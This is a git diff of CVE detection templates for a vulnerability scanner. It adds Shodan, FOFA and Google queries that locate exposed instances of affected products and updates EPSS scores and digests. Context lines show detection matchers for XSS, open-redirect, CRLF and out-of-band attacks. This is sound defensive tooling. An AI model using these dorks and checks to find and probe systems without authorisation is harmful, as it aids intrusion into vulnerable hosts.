+ shodan-query: http.title:"opmanager plus"
+ fofa-query: title="opmanager plus"
+ google-query: intitle:"opmanager plus"
tags: cve2015,cve,manageengine,edb,lfi,zohocorp
http:
@@ -51,4 +54,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206715646176dfaf881abea22a771b13d7191ddac25404b6da18043e32debb045a02206fc7d62fa1245bb84aa68f06446b12741e7c57561bc65de2c4b3992b421ad1b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml
index 2d6874a424..c1fc09a7f9 100644
--- a/http/cves/2015/CVE-2015-7823.yaml
+++ b/http/cves/2015/CVE-2015-7823.yaml
@@ -26,6 +26,9 @@ info:
max-request: 1
vendor: kentico
product: kentico_cms
+ google-query: intitle:"kentico database setup"
+ shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms"
+ fofa-query: title="kentico database setup"
tags: cve2015,cve,kentico,redirect,packetstorm
http:
@@ -38,4 +41,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e4cb1accc1f6aa60e3abe2a12e593d2018453a73db8d49cfd30df1a5acba3fe202210098b526e82020fb8a4e0d9d4c50a5a3d986ec9ccb5fd2b6e693561b4b66ed3bee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml
index f3987bd59c..af8e7b3406 100644
--- a/http/cves/2015/CVE-2015-8813.yaml
+++ b/http/cves/2015/CVE-2015-8813.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-8813
cwe-id: CWE-918
epss-score: 0.00511
- epss-percentile: 0.74145
+ epss-percentile: 0.76541
cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -39,4 +39,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206499e057c9d3a3e47b97921bc97140a1c6c2665c3f88b9aecdab84e783acc5a1022100f3638d8b005bcf951cc4bcef477dac5cf3438494276100d7cb26b6701140db28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml
index 72bff270c2..162581dcbb 100644
--- a/http/cves/2015/CVE-2015-9312.yaml
+++ b/http/cves/2015/CVE-2015-9312.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-9312
cwe-id: CWE-79
epss-score: 0.00088
- epss-percentile: 0.36245
+ epss-percentile: 0.3753
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -50,4 +50,4 @@ http:
- 'contains(body_2, "([A-Za-z0-9]+)<\/span>'
internal: true
part: body
-# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009528ca4f67e11fbcd8b18e6d2efb805ce25f9d0788175537480cb1bdab15695702203bcd33bb55f89932547aeddf042d65ba26776ced89eff267fb4f2424f2eec0e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml
index 8c3a189e04..19cf472b00 100644
--- a/http/cves/2016/CVE-2016-10108.yaml
+++ b/http/cves/2016/CVE-2016-10108.yaml
@@ -28,6 +28,7 @@ info:
vendor: western_digital
product: mycloud_nas
shodan-query: http.favicon.hash:-1074357885
+ fofa-query: icon_hash=-1074357885
tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital
http:
@@ -44,4 +45,4 @@ http:
- contains(interactsh_protocol, "dns")
- status_code == 200
condition: and
-# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220351cffb23009540be03abde85635acf590303ae2297d629b88db27a7d1d7cff802200127e1f9ffee3c57b152667745d8dce32de3fc3978f3831ddebe3b7809c8897b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml
index b08fbf231b..e1a3875b5a 100644
--- a/http/cves/2016/CVE-2016-10134.yaml
+++ b/http/cves/2016/CVE-2016-10134.yaml
@@ -27,6 +27,9 @@ info:
max-request: 1
vendor: zabbix
product: zabbix
+ shodan-query: http.favicon.hash:892542951
+ fofa-query: icon_hash=892542951
+ google-query: intitle:"zabbix-server"
tags: cve2016,cve,zabbix,sqli,vulhub
http:
@@ -46,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022064a357e04bfbda7eb1c4bbea5da2de7e8f09f1f848068a06e4d55b7cb2497fda022100ade13f3934e3425bb93c2be505bd6aec8eeec5ed9fc69c84515e92da8a4d3d54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml
index c8b0252ad6..f99d4589fe 100644
--- a/http/cves/2016/CVE-2016-10367.yaml
+++ b/http/cves/2016/CVE-2016-10367.yaml
@@ -29,6 +29,8 @@ info:
vendor: opsview
product: opsview
shodan-query: title:"Opsview"
+ fofa-query: title="opsview"
+ google-query: intitle:"opsview"
tags: cve2016,cve,opsview,lfi
http:
@@ -45,4 +47,4 @@ http:
- type: status
status:
- 404
-# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f475aa06b90130e2b8e28420ca4e0e3d4b009c40aa6a2f5424c85eb78dd4a0790221009c477bdc34bc528ca9464c768743191bbeb359f13af23fc1671c883716c0c151:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml
index f9d85a4d80..c777e69f54 100644
--- a/http/cves/2016/CVE-2016-10368.yaml
+++ b/http/cves/2016/CVE-2016-10368.yaml
@@ -28,6 +28,9 @@ info:
max-request: 1
vendor: opsview
product: opsview
+ shodan-query: http.title:"opsview"
+ fofa-query: title="opsview"
+ google-query: intitle:"opsview"
tags: cve2016,cve,redirect,opsview,authenticated
http:
@@ -49,4 +52,4 @@ http:
- type: status
status:
- 302
-# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100948052a5f3f4171269d27e8daf23f0aca9164b893bf2822e7c0d2db498ab1d39022100fe953696d9917f183fc424ce4c326a4de79ff5cd78483a6e718be65ce5da853d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml
index 5edceadde7..c1ba89ba21 100644
--- a/http/cves/2016/CVE-2016-10924.yaml
+++ b/http/cves/2016/CVE-2016-10924.yaml
@@ -15,13 +15,14 @@ info:
- https://www.exploit-db.com/exploits/39575
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924
- https://wordpress.org/plugins/ebook-download/#developers
+ - https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10924
cwe-id: CWE-22
- epss-score: 0.01429
- epss-percentile: 0.85146
+ epss-score: 0.01089
+ epss-percentile: 0.84323
cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -48,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210085fc3986ae66d40990e4a31f02cda6025e0cf6c150b726abb5ee64d8b910edf6022030737c9f147c5262287ddeb3743d846c5b60018f119a3e2ca38e94b557e03376:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml
index c9d3a43858..2a721c1141 100644
--- a/http/cves/2016/CVE-2016-10956.yaml
+++ b/http/cves/2016/CVE-2016-10956.yaml
@@ -14,13 +14,14 @@ info:
- https://wpvulndb.com/vulnerabilities/8609
- https://wordpress.org/plugins/mail-masta/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2016-10956
+ - https://github.com/p0dalirius/CVE-2016-10956-mail-masta
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10956
cwe-id: CWE-20
- epss-score: 0.01238
- epss-percentile: 0.83962
+ epss-score: 0.01123
+ epss-percentile: 0.84583
cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
@@ -47,4 +48,4 @@ http:
status:
- 200
- 500
-# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220538fc9ea958512767f2d8fe5e57e99b3b4b808a9034b6cf8f3c478c6274aad010220449e8eb0d19a0ee9a4d3baa931168afff6b0a7b8460414d2689d358e61a2688f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml
index 38766f39fb..f2782f9f85 100644
--- a/http/cves/2016/CVE-2016-10973.yaml
+++ b/http/cves/2016/CVE-2016-10973.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2016-10973
cwe-id: CWE-79
epss-score: 0.00177
- epss-percentile: 0.54991
+ epss-percentile: 0.54797
cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -50,4 +50,4 @@ http:
- 'contains(body_2, "tab = alert(document.domain);")'
- 'contains(body_2, "Brafton Article Loader")'
condition: and
-# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220794dbf512a1810009e7cd3e7bbb640cd76c0dc11d6c8f18bd09c931247485bc0022100e47ff8d6c0f657e433480f8453d0ef5bdb478696a22d503a10f7fb8a3976a91a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml
index 34b85f7428..7c8f173112 100644
--- a/http/cves/2016/CVE-2016-10993.yaml
+++ b/http/cves/2016/CVE-2016-10993.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2016-10993
cwe-id: CWE-79
epss-score: 0.00245
- epss-percentile: 0.62591
+ epss-percentile: 0.64569
cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -30,7 +30,6 @@ info:
product: scoreme
framework: wordpress
tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project
-
flow: http(1) && http(2)
http:
@@ -64,4 +63,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100edeeec357936c76c423de1da0e437b54e39b127084bf49d257d6fa40404537df02201b36b8f48e27504b38ea201e03181d77572ba400564be65921717a8b78a39809:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml
index b90433e242..e49e1523c5 100644
--- a/http/cves/2016/CVE-2016-1555.yaml
+++ b/http/cves/2016/CVE-2016-1555.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2016-1555
cwe-id: CWE-77
epss-score: 0.97373
- epss-percentile: 0.99898
+ epss-percentile: 0.99904
cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
-# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204478df4d956ba1393b007b7d82f7002f9054f7f3b400190b8bf3097228d2735602207904edcf73de6619898d2e0d33cca582c04caa2d5a5d8003959520e439b8b17a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml
index 7767adc2bf..1010f351b1 100644
--- a/http/cves/2016/CVE-2016-2389.yaml
+++ b/http/cves/2016/CVE-2016-2389.yaml
@@ -28,6 +28,7 @@ info:
vendor: sap
product: netweaver
shodan-query: http.favicon.hash:-266008933
+ fofa-query: icon_hash=-266008933
tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb
http:
@@ -44,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c0f5edb9dcfae071996574d4771f5371c930a81397ba6ea0d0f78b9df79b08610221009b7dc008da8799de3136a1311363e64efd38638efad47a5815f744dd08597efd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml
index b3519b5695..1e8267e001 100644
--- a/http/cves/2016/CVE-2016-3081.yaml
+++ b/http/cves/2016/CVE-2016-3081.yaml
@@ -28,6 +28,9 @@ info:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve2016,cve,struts,rce,apache
http:
@@ -45,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e0c0977c90d53736ce085938540079399fabd48a44beef5157e6f31f744aa3c022031ced870037d1b5f6dec56a3f31e42b00f7ab652b7ca75d399fa15ba4b69c094:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml
index fbbabd7b21..37dde34469 100644
--- a/http/cves/2016/CVE-2016-3088.yaml
+++ b/http/cves/2016/CVE-2016-3088.yaml
@@ -27,6 +27,7 @@ info:
max-request: 2
vendor: apache
product: activemq
+ shodan-query: cpe:"cpe:2.3:a:apache:activemq"
tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
rand1: '{{rand_int(11111111, 99999999)}}'
@@ -49,4 +50,4 @@ http:
- "status_code_2==200"
- "contains((body_2), '{{rand1}}')"
condition: and
-# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e9c55b0a4fd5097a215978a5b6010a918d459649c22eb4f1d753883da6f7b60e02210098985705a0228a24548b6efdeb0a9100b39af508de90ebf72528e0588f18cc75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml
index 9c1dd44d28..087874bbff 100644
--- a/http/cves/2016/CVE-2016-3978.yaml
+++ b/http/cves/2016/CVE-2016-3978.yaml
@@ -26,6 +26,8 @@ info:
max-request: 1
vendor: fortinet
product: fortios
+ shodan-query: http.html:"/remote/login" "xxxxxxxx"
+ fofa-query: body="/remote/login" "xxxxxxxx"
tags: cve2016,cve,redirect,fortinet,fortios,seclists
http:
@@ -38,4 +40,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b929553c26a8f5f0f26c3c88587748b9c2a2d2b3275fe12c5f9857e9cede65f5022100c799a6da8b81f359e5defd40655ff8a8351a0246c207ea9b754815cdbd2cf78d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml
index 5f4e61ccec..aba4c78863 100644
--- a/http/cves/2016/CVE-2016-4975.yaml
+++ b/http/cves/2016/CVE-2016-4975.yaml
@@ -20,12 +20,13 @@ info:
cve-id: CVE-2016-4975
cwe-id: CWE-93
epss-score: 0.00399
- epss-percentile: 0.70799
+ epss-percentile: 0.73471
cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: http_server
+ shodan-query: cpe:"cpe:2.3:a:apache:http_server"
tags: cve2016,cve,crlf,apache,xss
http:
@@ -38,4 +39,4 @@ http:
part: header
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
-# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f08206705552f730f7ad4e065175ade78aef2f56aeb31207f7f6cd92a2fadde022100d8eb6efe698663c3131c0423b0bde31d4866d579618b0cbfd46e9a507fea4b06:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml
index 57d085ae5e..5b46f4904b 100644
--- a/http/cves/2016/CVE-2016-5674.yaml
+++ b/http/cves/2016/CVE-2016-5674.yaml
@@ -14,8 +14,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-5674
cwe-id: CWE-20
- epss-score: 0.95705
- epss-percentile: 0.99378
+ epss-score: 0.95793
+ epss-percentile: 0.99431
cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*
metadata:
verified: true
@@ -24,7 +24,6 @@ info:
product: readynas_surveillance
fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login"
tags: cve,cve2016,nuuo,rce
-
variables:
rand: "{{to_lower(rand_text_alpha(32))}}"
@@ -50,4 +49,4 @@ http:
- "contains(body_2, 'Debugging Center')"
- "contains(body_2, 'Windows IP')"
condition: and
-# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206fcc24413a4fab283dc7fd59efec560e4a1f7cd9cd5bf6ac8dd51f41ca604dda02210083c5fd74de3024e39a4fb365680ecbe183fbb381fc280030d510b36eedf92484:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml
index 76c43f3f6e..38d141f86c 100644
--- a/http/cves/2016/CVE-2016-6195.yaml
+++ b/http/cves/2016/CVE-2016-6195.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2016-6195
cwe-id: CWE-89
epss-score: 0.00284
- epss-percentile: 0.68042
+ epss-percentile: 0.68612
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
metadata:
verified: "true"
@@ -30,6 +30,8 @@ info:
vendor: vbulletin
product: vbulletin
shodan-query: title:"Powered By vBulletin"
+ google-query: intext:"powered by vbulletin"
+ fofa-query: body="powered by vbulletin"
tags: cve2016,cve,vbulletin,sqli,forum,edb
http:
@@ -56,4 +58,4 @@ http:
- 200
- 503
condition: or
-# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022060d3b74c5e345660298a1474ea851ac0cdc6ed4d1be4c5e2cd84a49e2e79e06b0221008e2275a92a46a7525b4adc185cd37e7990f5b597f4217db969e2c4dc9a9f78db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml
index 016d2dad45..a632a4e242 100644
--- a/http/cves/2016/CVE-2016-7552.yaml
+++ b/http/cves/2016/CVE-2016-7552.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2016-7552
cwe-id: CWE-22
epss-score: 0.96711
- epss-percentile: 0.99632
+ epss-percentile: 0.99651
cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*
metadata:
max-request: 1
@@ -47,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205edf4891203be2e982cb79823b11b89eb92d074d01b239e68fc73f47ff65a61702204967e0b4fc76d68dc0ff070d2513427e927cd8dafc5ab0c6c40780cd82096d32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml
index 565495b0d6..647d30f54d 100644
--- a/http/cves/2016/CVE-2016-7981.yaml
+++ b/http/cves/2016/CVE-2016-7981.yaml
@@ -22,12 +22,14 @@ info:
cve-id: CVE-2016-7981
cwe-id: CWE-79
epss-score: 0.00258
- epss-percentile: 0.63488
+ epss-percentile: 0.6548
cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: spip
product: spip
+ shodan-query: http.html:"spip.php?page=backend"
+ fofa-query: body="spip.php?page=backend"
tags: cve2016,cve,xss,spip
http:
@@ -50,4 +52,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220108a509775dbaa87cc9ebc37fab6c4b29677f6ebba3b97c59dfc4a9599163916022100d5b68a149a425c74e250465df013918c58ca05d995f34ef2e1a43ed5aec34bb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml
index 2da0f6239e..08f0b059a6 100644
--- a/http/cves/2016/CVE-2016-8527.yaml
+++ b/http/cves/2016/CVE-2016-8527.yaml
@@ -14,13 +14,14 @@ info:
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
- https://www.exploit-db.com/exploits/41482/
- https://nvd.nist.gov/vuln/detail/CVE-2016-8527
+ - https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-8527
cwe-id: CWE-79
- epss-score: 0.00166
- epss-percentile: 0.53225
+ epss-score: 0.00117
+ epss-percentile: 0.45479
cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -48,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e9346e18bfb4c4d6a1081d41f4cd34352fa4d926162744dcc66b0333f6cb0b7f022100a130940d70233629a33858b36b594b16b3fac8249e1612e0dbee3f832cce06f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml
index cd9341263b..26fee7b905 100644
--- a/http/cves/2017/CVE-2017-0929.yaml
+++ b/http/cves/2017/CVE-2017-0929.yaml
@@ -27,6 +27,7 @@ info:
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
+ fofa-query: app="dotnetnuke"
tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware
http:
@@ -44,4 +45,4 @@ http:
- type: status
status:
- 500
-# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100befaa1c664964744dd1d8c6722277a114b6f2fa28380c244ba22f633b8e4853f022100b73c8d2c36b64be027b558818fd39677eca39927dc0b235c7aa625e51ff7af1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml
index 31c0a4ce81..c65c4c1cff 100644
--- a/http/cves/2017/CVE-2017-1000028.yaml
+++ b/http/cves/2017/CVE-2017-1000028.yaml
@@ -19,12 +19,13 @@ info:
cve-id: CVE-2017-1000028
cwe-id: CWE-22
epss-score: 0.97516
- epss-percentile: 0.99984
+ epss-percentile: 0.99986
cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
metadata:
max-request: 2
vendor: oracle
product: glassfish_server
+ shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
tags: cve,cve2017,oracle,glassfish,lfi,edb
http:
@@ -50,4 +51,4 @@ http:
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
-# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
